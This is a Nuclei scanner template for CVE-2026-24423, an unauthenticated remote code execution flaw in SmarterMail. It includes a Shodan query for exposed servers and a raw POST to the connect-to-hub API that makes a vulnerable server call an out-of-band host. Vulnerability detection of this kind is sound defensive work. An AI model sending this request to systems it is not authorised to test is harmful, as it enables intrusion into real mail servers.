id: CVE-2026-24423 info: name: SmarterMail - Remote Code Execution author: jyoti369 severity: critical description: | SmarterTools SmarterMail < build 9511 contains an unauthenticated remote code execution caused by malicious OS command execution via ConnectToHub API method, letting remote attackers execute arbitrary commands, exploit requires no authentication. impact: | Remote attackers can execute arbitrary OS commands, potentially leading to full system compromise. remediation: | Update to build 9511 or later. reference: - https://www.vulncheck.com/blog/smartermail-connecttohub-rce-cve-2026-24423 - https://code-white.com/public-vulnerability-list/ - https://www.smartertools.com/smartermail/release-notes/current - https://nvd.nist.gov/vuln/detail/CVE-2026-24423 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2026-24423 epss-score: 0.87693 epss-percentile: 0.99745 cwe-id: CWE-306 metadata: verified: true max-request: 1 shodan-query: html:"SmarterMail" tags: cve,cve2026,smartermail,rce,oast,kev,vkev http: - raw: - | POST /api/v1/settings/sysadmin/connect-to-hub HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"hubAddress":"http://{{interactsh-url}}","oneTimePassword":"{{randstr}}","nodeName":"{{randstr}}"} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: interactsh_request words: - "setup-initial-connection" # digest: 490a004630440220016b11e6ecfea57d70196b40c063b616678bebe29a045ee461ea84d3b2451f5a02202c288317570f117b7a0a9108dca5adc7aed69725cf5bf4d27f38a3ef62b76688:922c64590222798bb761d5b6d8e72950